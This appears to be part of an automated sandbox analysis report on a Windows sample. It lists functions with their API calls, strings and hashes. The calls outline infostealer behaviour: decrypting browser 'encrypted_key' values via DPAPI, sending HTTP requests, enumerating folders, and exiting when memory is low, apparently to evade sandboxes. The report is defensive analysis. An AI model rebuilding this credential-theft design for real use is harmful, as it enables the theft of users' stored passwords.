Part of subcall function 00B89AC0: LocalFree.KERNEL32(?,?,?,?,00B84EEE,00000000,?), ref: 00B89B3F

Part of subcall function 00B89B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B89B84
Part of subcall function 00B89B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00B89BA3
Part of subcall function 00B89B60: LocalFree.KERNEL32(?), ref: 00B89BD3

Strings

, xrefs: 00B89DC1
"encrypted_key":", xrefs: 00B89D30
DPAPI, xrefs: 00B89D89

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2100535398-738592651
Opcode ID: b19385295a79e9e29728475d553274e4514fddcb37bc143032824a03b281dd13
Instruction ID: d81d501bdae7f50810e5ab24965357332037d65eb80cab4f192ba3f811447455
Opcode Fuzzy Hash: b19385295a79e9e29728475d553274e4514fddcb37bc143032824a03b281dd13
Instruction Fuzzy Hash: 803110B5D10209ABCF04EBE4DC85AFEB7F8EB48304F1845A9E905A7251E7349A04CBA5

Function 00B96AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01339100,?,00BA110C,?,00000000,?,00BA1110,?,00000000,00BA0AEF), ref: 00B96ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B96AE8
CloseHandle.KERNEL32(00000000), ref: 00B96AF9
Sleep.KERNEL32(00001770), ref: 00B96B04
CloseHandle.KERNEL32(?,00000000,?,01339100,?,00BA110C,?,00000000,?,00BA1110,?,00000000,00BA0AEF), ref: 00B96B1A
ExitProcess.KERNEL32 ref: 00B96B22

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 557541e5c7aa789fe1b77ff62b68df9fab15b1afbcd88fcd97db6cbe139d146c
Instruction ID: b5a762fefac4887ff30827925b402fbf66d9cf741d8be3a4acdf9534cc8e4ba9
Opcode Fuzzy Hash: 557541e5c7aa789fe1b77ff62b68df9fab15b1afbcd88fcd97db6cbe139d146c
Instruction Fuzzy Hash: D5F05E7094030BABEF10ABA0DC4ABBD7BB4FB04745F1045B4B502E12C1DBB05540D6A6

Function 00B847B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B84839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00B84849

Strings

<, xrefs: 00B847C9

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: c8653dd28f439737ca2b9145446cf605d031df52254e4d3e265b7665da3863ae
Instruction ID: 9de90c7c44cec01e8dc741df50f95baea42c65ff57c9b7d22e95317de3295194
Opcode Fuzzy Hash: c8653dd28f439737ca2b9145446cf605d031df52254e4d3e265b7665da3863ae
Instruction Fuzzy Hash: 71214FB1D00209ABDF14DFA4E845ADE7B75FB45320F108625F915A72D1EB706A05CF91

Function 00B951F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Part of subcall function 00B86280: InternetOpenA.WININET(00BA0DFE,00000001,00000000,00000000,00000000), ref: 00B862E1
Part of subcall function 00B86280: StrCmpCA.SHLWAPI(?,0133E898), ref: 00B86303
Part of subcall function 00B86280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B86335
Part of subcall function 00B86280: HttpOpenRequestA.WININET(00000000,GET,?,0133E010,00000000,00000000,00400100,00000000), ref: 00B86385
Part of subcall function 00B86280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B863BF
Part of subcall function 00B86280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B863D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B95228

Strings

ERROR, xrefs: 00B95273
ERROR, xrefs: 00B9521A

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 22e6b9b439016201e9f1b71e9a81147bedb3eb2571e30f42e1b1933e39cd9400
Instruction ID: e0bc51cebd8ec5c54510245687f4f881cdf48941c0c62c55896441f9db37dabe
Opcode Fuzzy Hash: 22e6b9b439016201e9f1b71e9a81147bedb3eb2571e30f42e1b1933e39cd9400
Instruction Fuzzy Hash: 4111DA30910148ABCF14FFA4DD92AED77B8AF50340F4045B8F81A5A592EF34AB06C791

Function 00B81220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B8123E
ExitProcess.KERNEL32 ref: 00B81294

Strings

@, xrefs: 00B81233

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: bae016268d897d6db1d56d1fc4fb310b075eaaaa8f9f9f0b44ce01dfe190e917
Instruction ID: 33c42ace676c812402d9d054342ee4469ffa74875f260060845e03f1843e2de9
Opcode Fuzzy Hash: bae016268d897d6db1d56d1fc4fb310b075eaaaa8f9f9f0b44ce01dfe190e917
Instruction Fuzzy Hash: CC01FFB0945308AADF10EFE8CC49F9DB7B8AB15705F208494E705B62D0D67455458B99

Function 00B94F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B98DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B98E0B

lstrcat.KERNEL32(?,00000000), ref: 00B94F7A
lstrcat.KERNEL32(?,00BA1070), ref: 00B94F97
lstrcat.KERNEL32(?,01338FA0), ref: 00B94FAB
lstrcat.KERNEL32(?,00BA1074), ref: 00B94FBD

Part of subcall function 00B94910: wsprintfA.USER32 ref: 00B9492C
Part of subcall function 00B94910: FindFirstFileA.KERNEL32(?,?), ref: 00B94943

Part of subcall function 00B94910: StrCmpCA.SHLWAPI(?,00BA0FDC), ref: 00B94971
Part of subcall function 00B94910: StrCmpCA.SHLWAPI(?,00BA0FE0), ref: 00B94987
Part of subcall function 00B94910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B94B7D
Part of subcall function 00B94910: FindClose.KERNEL32(000000FF), ref: 00B94B92

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: a3278866caa780f77b07e93c43f881db8ecdd816892ccc623afaff043895e2de
Instruction ID: 5c0aaf41c134886ab38bb12aa1b61bc425b39346dcd63fa2fc1eb30c69886ef8
Opcode Fuzzy Hash: a3278866caa780f77b07e93c43f881db8ecdd816892ccc623afaff043895e2de
Instruction Fuzzy Hash: D321B6769043096BCB54FBA4EC46EE933BCAB55304F0045D8B649D2191EE749AC9CBB2

Function 00B90740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01339030), ref: 00B9079A
StrCmpCA.SHLWAPI(00000000,01338FC0), ref: 00B90866
StrCmpCA.SHLWAPI(00000000,01338EB0), ref: 00B9099D

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 32ccffc35671f3dd958b51bef06c8741384f6d45ecc51ede53920658d5d52306
Instruction ID: 09eaa2dcf160f7e28fcd1bfdfc3abbe78771acc5064e1bd875064c596d1cc2a3
Opcode Fuzzy Hash: 32ccffc35671f3dd958b51bef06c8741384f6d45ecc51ede53920658d5d52306
Instruction Fuzzy Hash: 89916775A102099FCF18EF68D992AED77F9FF95300F408568E8099F251DA309A06CBD2

Function 00B90765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01339030), ref: 00B9079A
StrCmpCA.SHLWAPI(00000000,01338FC0), ref: 00B90866
StrCmpCA.SHLWAPI(00000000,01338EB0), ref: 00B9099D

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
